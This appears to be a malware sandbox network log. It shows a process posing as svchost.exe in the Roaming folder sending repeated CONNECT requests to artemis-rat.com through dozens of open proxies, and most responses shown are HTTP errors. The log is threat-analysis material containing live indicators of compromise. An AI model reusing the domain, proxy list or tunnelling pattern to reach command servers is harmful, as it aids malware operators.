Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.214668989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.577833891 CET	704	IN	HTTP/1.1 502 Bad Gateway Server: huawei Date: Sat, 09 Mar 2024 12:01:52 GMT Content-Type: text/html Content-Length: 553 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 75 61 77 65 69 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>huawei</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2874	192.168.2.5	59107	117.160.250.163	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.233104944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.646058083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.833692074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.426767111 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:36 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2875	192.168.2.5	56896	138.68.155.22	44660	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.234463930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2876	192.168.2.5	59361	46.35.9.110	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.236162901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2877	192.168.2.5	59347	110.12.211.140	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.237519979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2878	192.168.2.5	59346	43.155.130.182	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.238806009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2879	192.168.2.5	59369	23.137.248.197	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.241118908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2880	192.168.2.5	59367	51.15.247.93	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.241122961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2881	192.168.2.5	59345	185.158.114.14	25697	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.251075983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2882	192.168.2.5	59359	27.96.235.171	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.251075983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.557735920 CET	326	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2883	192.168.2.5	58591	51.161.131.84	49202	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.253117085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.964725971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.677725077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.020589113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.677675962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2884	192.168.2.5	59365	121.164.200.18	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.255842924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2885	192.168.2.5	59360	168.138.231.177	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.275988102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.964718103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.974633932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2886	192.168.2.5	59387	188.166.17.18	8881	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.305016994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.606606960 CET	310	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html; charset=utf-8 Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2887	192.168.2.5	59391	82.210.56.251	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.305018902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.145659924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.146315098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.146348953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2888	192.168.2.5	58687	203.19.38.114	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.305558920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.145848989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.146373034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.146445990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2889	192.168.2.5	59370	43.133.70.57	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.305562973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2890	192.168.2.5	59417	201.174.239.28	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.305972099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2891	192.168.2.5	59422	142.54.228.193	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.307763100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2892	192.168.2.5	58715	148.72.215.230	4990	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.309389114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.146176100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2893	192.168.2.5	59407	221.153.92.39	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.311101913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2894	192.168.2.5	59368	45.11.95.165	5219	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.311180115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2895	192.168.2.5	59386	14.103.24.20	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.313497066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2896	192.168.2.5	59154	183.234.215.11	8443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.317084074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.019829988 CET	536	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.24.0 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 559 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.24.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to dis

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2897	192.168.2.5	59399	82.137.244.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.336232901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2898	192.168.2.5	59413	43.128.146.42	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.343862057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2899	192.168.2.5	59363	93.171.220.229	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.344016075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.146133900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2900	192.168.2.5	58806	162.241.53.72	49858	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.346354008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2901	192.168.2.5	59430	31.43.179.214	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.359407902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.513673067 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

